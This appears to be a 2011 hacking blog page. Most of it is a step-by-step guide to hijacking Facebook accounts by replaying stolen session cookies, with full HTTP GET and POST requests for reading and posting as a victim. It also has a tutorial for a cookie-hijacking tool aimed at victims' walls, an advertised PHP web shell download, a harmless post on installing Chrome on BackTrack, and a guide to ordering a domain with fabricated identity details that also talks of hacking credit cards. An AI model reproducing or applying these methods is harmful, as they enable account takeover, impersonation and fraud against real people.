Powered By Blogger

Sunday, July 24, 2011

Controlling facebook accounts [No Pasword][Non-Script Kiddie Tut]

Login to your Facebook account and sniff your cookie OR collect a few live Facebook Biscuit/s of your Target/s.

1 ] Generate a OG 10 Digit Unix Timestamp. If possible not way back older than FaceBook.COM's current SYSTIME.


2 ] Send a GET Request to www.facebook.com port 80 after calculating the required variables (below)

GET /home.php? HTTP/1.1
Cookie: datr=(10-DIGIT-CURRENT-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; cvr_tx=(OG-TIME-STAMP+63-TOTAL-SHOULD-BE-10-DIGIT-NEWTIMESTAMP)859; login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); made_write_conn=(OG-TIME-STAMP+64-10-DIGIT-NEW-STAMP); cur_max_lag=3; h_user=(12-HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US



3 ] From the Response Obtained :
Gain the variable nctr[nid]. For now keep nctr[id] same as nctr[nid].

Calculating the new nctr[ct] :
Add +79 to Original Timestamp. Append 3 more digits to its end.

Calculating &oldest= :
Deduct 144556 from Original Timestamp.

Calculating composer_id :
Search for
UIComposer_STATE_PIC_OUTSIDE\" id=\"
This will be your composer_id at the later stage in the Status Update Page / Other Post Request

Calculating post_form_id
Search for
post_form_id:"
This will be your post_form_id at the later stage in the Status Update Page / Other Post Request

Calculating fb_dtsg
Right after post_form_id (explained just above this section) you can locate fb_dtsg.
Else Search for
,fb_dtsg:"
This will be your fb_dtsg at the later stage in the Status Update Page / Other Post Request

Your login_x actually looks like
a:2:{s:5:"email";s:13:"you@youremailprovider.com";s:19:"remember_me_default";b:0;}
But keep it unchanged in the hex format.


4 ] Send a GET Request like below with the above calculated variables :

GET /ajax/intent.php?hidden_count=5&oldest=(10-DIGIT-NEWLY-CALCULATED)&delay_load_count=15&request_type=none&nctr[id]=(32-HEX-STRING-OBTAINED-FROM-home.php-)&nctr[nid]=(32-HEX-STRING-OBTAINED-FROM-home.php-)&nctr[ct]=(NEWLY-CALCULATED-10-DIGIT-TIMESTAMP)750 HTTP/1.1
Accept: */*
Accept-Language: en-US
XXXXXXX: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
x-svn-rev: 161013
UA-CPU: x86
XXXXXXXXXXXXXXX: XXXXXXXXXXXXX
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.facebook.com
Connection: Keep-Alive
Cookie: datr=(10-DIGIT-CURRENt-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); made_write_conn=(OG-TIME-STAMP+64-10-DIGIT-NEW-STAMP); cur_max_lag=3; h_user=(12-HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US; x-referer=http%3A%2F%2Fwww.facebook.com%2Fhome.php



5 ] In the output :
Search for Env[\"nctrlid\"]=\"
This is the NEW TRUE nctr[id]= for the Status Update POST Request :-)


6 ] Generate a new POST Request with the above calculated new variables :

POST /updatestatus.php HTTP/1.1
Accept: */*
Accept-Language: en-US
XXXXXXX: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
x-svn-rev: 161013
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
XXXXXXXXXXXXXXX: XXXXXXXXXXXXX
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.facebook.com
Content-Length: 343
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: datr=(10-DIGIT-CURRENt-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); cur_max_lag=3; h_user=(12-HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US; x-referer=http%3A%2F%2Fwww.facebook.com%2Fhome.php

action=HOME_UPDATE&home_tab_id=1&profile_id=(YOUR-10-DIGIT-PROFILE-ID)&status=TYPE-THE-STATUS-HERE&target_id=0&&composer_id=(24-HEX-STRING-OBTAINED-FROM-home.php-RESPONSE))&post_form_id=(32-HEX-STRING-FROM-home.php-RESPONSE)&fb_dtsg=(27-HEX-STRING-)-FROM-home.php-RESPONSE&post_form_id_source=AsyncRequest&nctr[id]=(32-HEX-STRING-CALCULATED-AS-EXPLAINED-IN-POINT-5)&nctr[nid]=(32-HEX-STRING-OBTAINED-FROM-home.php-RESPONSE)&nctr[ct]=(10-DIGIT-CALCULATED-TIMESTAMP-AS-EXPLAINED-In-POINT-3)375




7 ] Use the above variables to view any content with the appropriate GET / requests


8 ] For POST-ing making changes, GOTO 2 ] and REDO :-)

[PHP]Php Shell R00TSH3ll[SHELL]

Hey guys I made my own php shell that any one can use plz do not edit otherwise in further version with huge improvments will be encrypted to base64.
heres link:
R00TSH3ll Beta 2 Build 3
311 KB.

Hijacking Facebook with cookies !!! (Multi-Platform)

Download to FBController
This is facebook controller v3.
Software Required:
FBControllerv3
Backtrack5 or Windows or other distros that have WINE (BT comes with WINE)
Mantra (Comes with BT5) otherwise goto: Mantra HOmepage
gedit / notepad
------------------------
Ok, start up mantra and go to facebook.com and goto your victims wall.
Goto firebug then to Firecookie and view the cookies.
Open up COOKIE text file and match cookies in mantra with COOKIE text file with victims information and save it when your finished.
then load up Command Prompt if your in Windows. If not goto WINE explorer and goto C:\Windows\System32\ and hit cmd.exe then it will WINE's command prompt that work just like windows goto the directory of fbcontrolller and use this synatx.
FBController COOKIE.txt then if its successfull then it will show multiple options to compromise facebooks account.
AGREEMENT:
By reading this tutorial and downloading the file your responsible not hini or author of these software.
~ This tutorial was written by HiniAes do not leech.

Tuesday, July 19, 2011

Tutorial How to Install Google Chrome on BT5 same as Ubuntu

Installing Google Chrome on Backtrack 5

Google Chrome can be installed in many ways, on Ubuntu 11.04. Here I’ll explain few simple methods. You can also install Chromium (almost similar to Google Chrome), it is available in Ubuntu Software Center or Synaptic Package Manager. Just follow the steps -
step #1 : Go to its official website and download the Debian Package. Google Chrome version 10.x.* is the latest one.
Download the Google Chrome for Backtrack5
step #2 : Open the saved file with Ubuntu Software Center (Right Click on the Package, then select Open With USC; click on install Button to proceed) or Use the dpkg command to install the package. To install from the command line, type the command given below and enter your login password to proceed.
dpkg -i google-chrome-stable_current_i386.deb
step #3 : That’s all.. No more steps.. Enjoy surfing with Chrome.
Here is one snapshot, how Google Chrome looks on BT5

Get Free Domain [Fraud + Knowledge]

On no account I would be held responsible of your act.

Requires:
1. Google Chrome (to translate) Download: http://6660e7e2.spam.com
2.e-mail address!

First, go to: http://1c2e4b4b.spam.com
Ok, now enter the domain you want

Select one of the available domain that you want

Click the Next button

Select a hosting package and click "Order Now"

Click next button

Now, you need to enter personal information! Of course, you will not do that unless you are idiot! You need to create a false identity, how? Follow these instructions! Go to: http://576d357f.spam.com and fill empty seats false data. In doing so, click generate!
And there complete the form false information!

Now you will be prompted to enter your name and number of accounts. You will not do that (unless you are retard) but you will add information from the previous step!

You will now see the details of the order!

Check the box that says "I have read the terms etc" and then click "close order"

And finally, it will ask you to confirm your order!

It is better to hack credit and then register a domain, but i will show you that maybe some other time ...

PS: Replace spam to link bucks (without space)
Have fun :D